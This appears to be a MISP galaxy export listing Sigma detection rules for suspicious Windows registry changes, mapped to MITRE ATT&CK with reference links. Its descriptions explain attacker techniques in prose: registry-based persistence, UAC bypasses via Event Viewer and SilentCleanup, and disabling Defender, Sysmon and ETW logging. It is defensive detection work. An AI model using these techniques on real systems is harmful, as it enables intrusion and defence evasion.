https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml

Modification of IE Registry Settings

Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the Trusted Sites zone or insert JavaScript for persistence.

The tag is: misp-galaxy:sigma-rules="Modification of IE Registry Settings"

Modification of IE Registry Settings has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9459. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ie.yml

PowerShell as a Service in Registry

Detects PowerShell code being written to the registry as a service.

The tag is: misp-galaxy:sigma-rules="PowerShell as a Service in Registry"

PowerShell as a Service in Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9460. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_as_service.yml

Enabling COR Profiler Environment Variables

Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.

The tag is: misp-galaxy:sigma-rules="Enabling COR Profiler Environment Variables"

Enabling COR Profiler Environment Variables has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="COR_PROFILER - T1574.012" with estimative-language:likelihood-probability="almost-certain"

Table 9461. Table References

Links

https://twitter.com/jamieantisocial/status/1304520651248668673

https://learn.microsoft.com/en-us/dotnet/core/runtime-config/debugging-profiling

https://www.sans.org/cyber-security-summit/archives

https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml

Suspicious Printer Driver Empty Manufacturer

Detects a suspicious printer driver installation with an empty Manufacturer value

The tag is: misp-galaxy:sigma-rules="Suspicious Printer Driver Empty Manufacturer"

Suspicious Printer Driver Empty Manufacturer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"

Table 9462. Table References

Links

https://twitter.com/SBousseaden/status/1410545674773467140

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml

Set TimeProviders DllName

Detects processes setting a new DLL in DllName under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.

The tag is: misp-galaxy:sigma-rules="Set TimeProviders DllName"

Set TimeProviders DllName has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Time Providers - T1547.003" with estimative-language:likelihood-probability="almost-certain"

Table 9463. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_timeproviders_dllname.yml

Uncommon Extension In Keyboard Layout IME File Registry Value

Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.

The tag is: misp-galaxy:sigma-rules="Uncommon Extension In Keyboard Layout IME File Registry Value"

Uncommon Extension In Keyboard Layout IME File Registry Value has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9464. Table References

Links

https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ime_non_default_extension.yml

Suspicious Environment Variable Has Been Registered

Detects the creation of user-specific or system-wide environment variables via the registry that contain suspicious commands and strings.

The tag is: misp-galaxy:sigma-rules="Suspicious Environment Variable Has Been Registered"

Table 9465. Table References

Links

https://infosec.exchange/@sbousseaden/109542254124022664

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_suspicious_env_variables.yml

Change User Account Associated with the FAX Service

Detects a change of the user account associated with the FAX service to avoid the escalation problem.

The tag is: misp-galaxy:sigma-rules="Change User Account Associated with the FAX Service"

Change User Account Associated with the FAX Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9466. Table References

Links

https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf

https://twitter.com/dottor_morte/status/1544652325570191361

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml

Disable Administrative Share Creation at Startup

Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system.

The tag is: misp-galaxy:sigma-rules="Disable Administrative Share Creation at Startup"

Disable Administrative Share Creation at Startup has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005" with estimative-language:likelihood-probability="almost-certain"

Table 9467. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml

Suspicious Shim Database Patching Activity

Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.

The tag is: misp-galaxy:sigma-rules="Suspicious Shim Database Patching Activity"

Suspicious Shim Database Patching Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011" with estimative-language:likelihood-probability="almost-certain"

Table 9468. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml

Outlook Security Settings Updated - Registry

Detects changes to the registry values related to Outlook security settings.

The tag is: misp-galaxy:sigma-rules="Outlook Security Settings Updated - Registry"

Outlook Security Settings Updated - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"

Table 9469. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md

https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_security_settings.yml

New Netsh Helper DLL Registered From A Suspicious Location

Detects changes to the Netsh registry key to add a new DLL value that is located in a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper.

The tag is: misp-galaxy:sigma-rules="New Netsh Helper DLL Registered From A Suspicious Location"

New Netsh Helper DLL Registered From A Suspicious Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1546.007" with estimative-language:likelihood-probability="almost-certain"

Table 9470. Table References

Links

https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/

https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml

Disable Exploit Guard Network Protection on Windows Defender

Detects the disabling of Windows Defender Exploit Guard Network Protection.

The tag is: misp-galaxy:sigma-rules="Disable Exploit Guard Network Protection on Windows Defender"

Disable Exploit Guard Network Protection on Windows Defender has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9471. Table References

Links

https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml

Office Macros Auto-Enabled

Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.

The tag is: misp-galaxy:sigma-rules="Office Macros Auto-Enabled"

Office Macros Auto-Enabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9472. Table References

Links

https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/

https://twitter.com/inversecos/status/1494174785621819397

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_vba_warnings_tamper.yml

Potential Persistence Via LSA Extensions

Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass. The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via LSA Extensions"

Table 9473. Table References

Links

https://persistence-info.github.io/Data/lsaaextension.html

https://twitter.com/0gtweet/status/1476286368385019906

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_lsa_extension.yml

Bypass UAC Using Event Viewer

Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification

The tag is: misp-galaxy:sigma-rules="Bypass UAC Using Event Viewer"

Bypass UAC Using Event Viewer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Port Monitors - T1547.010" with estimative-language:likelihood-probability="almost-certain"

Table 9474. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd

https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml

Suspicious New Printer Ports in Registry (CVE-2020-1048)

Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048

The tag is: misp-galaxy:sigma-rules="Suspicious New Printer Ports in Registry (CVE-2020-1048)"

Suspicious New Printer Ports in Registry (CVE-2020-1048) has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9475. Table References

Links

https://windows-internals.com/printdemon-cve-2020-1048/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml

Enable Microsoft Dynamic Data Exchange

Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.

The tag is: misp-galaxy:sigma-rules="Enable Microsoft Dynamic Data Exchange"

Enable Microsoft Dynamic Data Exchange has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"

Table 9476. Table References

Links

https://msrc.microsoft.com/update-guide/vulnerability/ADV170021

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_enable_dde.yml

New Application in AppCompat

A general detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.

The tag is: misp-galaxy:sigma-rules="New Application in AppCompat"

New Application in AppCompat has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9477. Table References

Links

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.md

https://github.com/OTRF/detection-hackathon-apt29/issues/1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml

Windows Defender Service Disabled

Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry

The tag is: misp-galaxy:sigma-rules="Windows Defender Service Disabled"

Windows Defender Service Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9478. Table References

Links

https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105

https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml

ScreenSaver Registry Key Set

Detects a registry key set after a masqueraded .scr file is executed via Rundll32 through desk.cpl

The tag is: misp-galaxy:sigma-rules="ScreenSaver Registry Key Set"

ScreenSaver Registry Key Set has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 9479. Table References

Links

https://twitter.com/VakninHai/status/1517027824984547329

https://twitter.com/pabraeken/status/998627081360695297

https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml

Hypervisor Enforced Code Integrity Disabled

Detects changes to the HypervisorEnforcedCodeIntegrity registry key where the "Enabled" value is set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code into the kernel

The tag is: misp-galaxy:sigma-rules="Hypervisor Enforced Code Integrity Disabled"

Hypervisor Enforced Code Integrity Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9480. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/04e487c1828d76df3e834621f4f893ea756d5232/atomics/T1562.001/T1562.001.md#atomic-test-43---disable-hypervisor-enforced-code-integrity-hvci

https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml

Potential Persistence Via Outlook Today Pages

Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key "UserDefinedUrl".

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Outlook Today Pages"

Potential Persistence Via Outlook Today Pages has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9481. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=74

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_outlook_todaypage.yml

Potential Persistence Via AutodialDLL

Detects changes to the "AutodialDLL" key, which could be used as a persistence method to load a custom DLL via the "ws2_32" library

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via AutodialDLL"

Table 9482. Table References

Links

https://persistence-info.github.io/Data/autodialdll.html

https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml

Modify User Shell Folders Startup Value

Detects modification of the startup key to a path where a payload could be stored to be launched during startup

The tag is: misp-galaxy:sigma-rules="Modify User Shell Folders Startup Value"

Modify User Shell Folders Startup Value has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9483. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders.yml

Disable Sysmon Event Logging Via Registry

Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.

The tag is: misp-galaxy:sigma-rules="Disable Sysmon Event Logging Via Registry"

Disable Sysmon Event Logging Via Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9484. Table References

Links

https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650

https://youtu.be/zSihR3lTf7g

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml

CurrentVersion Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="CurrentVersion Autorun Keys Modification"

CurrentVersion Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9485. Table References

Links

https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml

Modification of Explorer Hidden Keys

Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.

The tag is: misp-galaxy:sigma-rules="Modification of Explorer Hidden Keys"

Modification of Explorer Hidden Keys has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

Table 9486. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_file.yml

Registry Modification to Hidden File Extension

Hides the file extension through modification of the registry

The tag is: misp-galaxy:sigma-rules="Registry Modification to Hidden File Extension"

Registry Modification to Hidden File Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"

Table 9487. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A

https://unit42.paloaltonetworks.com/ransomware-families/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml

Adwind RAT / JRAT - Registry

Detects javaw.exe in AppData folder as used by Adwind / JRAT

The tag is: misp-galaxy:sigma-rules="Adwind RAT / JRAT - Registry"

Adwind RAT / JRAT - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 9488. Table References

Links

https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf

https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml

Bypass UAC Using SilentCleanup Task

Detects the setting of the environment variable "windir" to a non-default value. Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.

The tag is: misp-galaxy:sigma-rules="Bypass UAC Using SilentCleanup Task"

Bypass UAC Using SilentCleanup Task has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9489. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task

https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/

https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml

ClickOnce Trust Prompt Tampering

Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.

The tag is: misp-galaxy:sigma-rules="ClickOnce Trust Prompt Tampering"

ClickOnce Trust Prompt Tampering has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9490. Table References

Links

https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5

https://learn.microsoft.com/en-us/visualstudio/deployment/how-to-configure-the-clickonce-trust-prompt-behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_clickonce_trust_prompt.yml

Suspicious Service Installed

Detects installation of NalDrv or PROCEXP152 services via registry keys pointing to non-system32 folders. Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)

The tag is: misp-galaxy:sigma-rules="Suspicious Service Installed"

Suspicious Service Installed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9491. Table References

Links

https://web.archive.org/web/20200419024230/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_service_installed.yml

DNS-over-HTTPS Enabled by Registry

Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or to hide the process of exfiltrating data. With this enabled, organizations will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.

The tag is: misp-galaxy:sigma-rules="DNS-over-HTTPS Enabled by Registry"

DNS-over-HTTPS Enabled by Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9493. Table References

Links

https://github.com/elastic/detection-rules/issues/1371

https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS

https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode

https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml

Potential WerFault ReflectDebugger Registry Value Abuse

Detects potential WerFault "ReflectDebugger" registry value abuse for persistence.

The tag is: misp-galaxy:sigma-rules="Potential WerFault ReflectDebugger Registry Value Abuse"

Potential WerFault ReflectDebugger Registry Value Abuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 9494. Table References

Links

https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html

https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_reflectdebugger.yml

Disable Windows Security Center Notifications

Detects setting UseActionCenterExperience to 0 to disable Windows Security Center notifications

The tag is: misp-galaxy:sigma-rules="Disable Windows Security Center Notifications"

Disable Windows Security Center Notifications has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9495. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml

Potential Persistence Via Event Viewer Events.asp

Detects potential registry persistence technique using the Event Viewer "Events.asp" technique

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Event Viewer Events.asp"

Potential Persistence Via Event Viewer Events.asp has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9496. Table References

Links

https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks

https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md

https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/

https://twitter.com/nas_bench/status/1626648985824788480

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml

Hide Schedule Task Via Index Value Tamper

Detects when the "index" value of a scheduled task is modified in the registry, which effectively hides it from tooling such as "schtasks /query" (read the referenced link for more information about the effects of this technique)

The tag is: misp-galaxy:sigma-rules="Hide Schedule Task Via Index Value Tamper"

Hide Schedule Task Via Index Value Tamper has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 9497. Table References

Links

https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml

ETW Logging Disabled In .NET Processes - Sysmon Registry

Potential adversaries stopping ETW providers recording loaded .NET assemblies.

The tag is: misp-galaxy:sigma-rules="ETW Logging Disabled In .NET Processes - Sysmon Registry"

ETW Logging Disabled In .NET Processes - Sysmon Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 9499. Table References

Links

https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables

https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/

https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf

https://twitter.com/xpn/status/1268712093928378368

https://bunnyinside.com/?term=f71e8cb9c76a

http://managed670.rssing.com/chan-5590147/all_p1.html

https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr

https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38

https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code

https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39

https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml

Potential Persistence Via COM Hijacking From Suspicious Locations

Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unusual location

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via COM Hijacking From Suspicious Locations"

Potential Persistence Via COM Hijacking From Suspicious Locations has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

Table 9500. Table References

Links

https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml

Internet Explorer Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="Internet Explorer Autorun Keys Modification"

Internet Explorer Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

